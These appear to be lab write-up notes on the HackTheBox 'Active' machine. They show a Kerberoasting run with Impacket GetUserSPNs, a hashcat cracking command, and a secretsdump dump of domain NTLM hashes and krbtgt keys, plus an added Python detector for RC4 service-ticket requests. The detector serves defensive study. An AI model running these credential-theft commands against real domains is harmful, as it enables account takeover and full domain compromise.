Kerberos


Good Link - https://room362.com/post/2016/kerberoast-pt2/

Here we use an authenticated user with limited access to obtain Kerberos service tickets.
We request tickets for all of the user accounts that have an SPN; they are output in John the Ripper format.

GetUserSPNs.py -request ACTIVE.htb/SVC_TGS:GPPstillStandingStrong2k18

Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon          
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40  2018-07-30 18:17:40



$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$e707c675c1ba43ae
---snipe---

---snipe---




We can now crack this with hashcat

/opt/hashcat/hashcat -a 0 -m 13100 keberos-ticket.txt -w 3 rockyou.txt
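
Detection side of the request shown above, as an added example that is not part of the original post: it filters Security event 4769 (service ticket requested) records for RC4 tickets (encryption type 0x17, the "23" in $krb5tgs$23$) issued for user-account services, then groups them by requester. The CSV column names, the svc_sql and WS01$ accounts and the client addresses are constructed for illustration.

```python
import csv
import io
from collections import defaultdict

# Constructed sample: fields of event 4769 exported to CSV (not real logs).
SAMPLE_4769 = """time,account,client_ip,service_name,etype
2018-07-30T18:10:01,SVC_TGS@ACTIVE.HTB,10.10.14.5,Administrator,0x17
2018-07-30T18:10:02,jsmith@ACTIVE.HTB,10.10.10.21,DC$,0x12
2018-07-30T18:10:03,jsmith@ACTIVE.HTB,10.10.10.21,krbtgt,0x12
2018-07-30T18:10:04,SVC_TGS@ACTIVE.HTB,10.10.14.5,svc_sql,0x17
2018-07-30T18:10:05,jsmith@ACTIVE.HTB,10.10.10.21,svc_sql,0x12
2018-07-30T18:10:06,WS01$@ACTIVE.HTB,10.10.10.30,DC$,0x17
"""

RC4_HMAC = 0x17  # Kerberos etype 23


def suspicious_requests(csv_text):
    """Return 4769 rows where an RC4 ticket was issued for a user-account service."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        service = row["service_name"]
        if int(row["etype"], 16) != RC4_HMAC:
            continue  # AES tickets are the normal case on current domains
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # machine accounts and krbtgt have long random keys
        hits.append(row)
    return hits


def summarize(hits):
    """Group hits by (requester, client address) -> sorted distinct service accounts."""
    grouped = defaultdict(set)
    for row in hits:
        grouped[(row["account"], row["client_ip"])].add(row["service_name"])
    return {key: sorted(services) for key, services in grouped.items()}


if __name__ == "__main__":
    for (account, ip), services in summarize(suspicious_requests(SAMPLE_4769)).items():
        print(f"{account} from {ip}: RC4 tickets for {len(services)} services: {services}")
```

The etype filter only catches RC4 requests; the durable mitigation is a long random password on every account that carries an SPN, for example through group managed service accounts.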


===========================================

We can also dump the hashes now that we have obtained administrative access.

We do this using Impacket's secretsdump.


root@kali# impacket-secretsdump  -just-dc ACTIVE.htb/Administrator@10.10.10.100 -use-vss
 
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

Password:
[*] Target system bootKey: 0xff954ee81ffb63937b563f523caf1d59
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: ed534631c56761ebb03df2c7bbc18b12
[*] Reading and decrypting hashes from \\10.10.10.100\ADMIN$\Temp\jVykSHdL.tmp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:af19ec65874cc2b8090cde7d8f4152ca:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
active.htb\SVC_TGS:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
[*] Kerberos keys from \\10.10.10.100\ADMIN$\Temp\jVykSHdL.tmp
Administrator:aes256-cts-hmac-sha1-96:003b207686cfdbee91ff9f5671aa10c5d940137da387173507b7ff00648b40d8
Administrator:aes128-cts-hmac-sha1-96:48347871a9f7c5346c356d76313668fe
Administrator:des-cbc-md5:5891549b31f2c294
DC$:aes256-cts-hmac-sha1-96:831c7121df34c61f71b1e4dccd1f27f43c93742d556906f6952eaa40cb768625
DC$:aes128-cts-hmac-sha1-96:e580dfb4a0df0665bb49ae2918daf235
DC$:des-cbc-md5:02861ca1a71907a1
krbtgt:aes256-cts-hmac-sha1-96:cd80d318efb2f8752767cd619731b6705cf59df462900fb37310b662c9cf51e9
krbtgt:aes128-cts-hmac-sha1-96:b9a02d7bd319781bc1e0a890f69304c3
krbtgt:des-cbc-md5:9d044f891adf7629
active.htb\SVC_TGS:aes256-cts-hmac-sha1-96:d59943174b17c1a4ced88cc24855ef242ad328201126d296bb66aa9588e19b4a
active.htb\SVC_TGS:aes128-cts-hmac-sha1-96:f03559334c1111d6f792d74a453d6f31
active.htb\SVC_TGS:des-cbc-md5:d6c7eca70862f1d0
[*] Cleaning up...
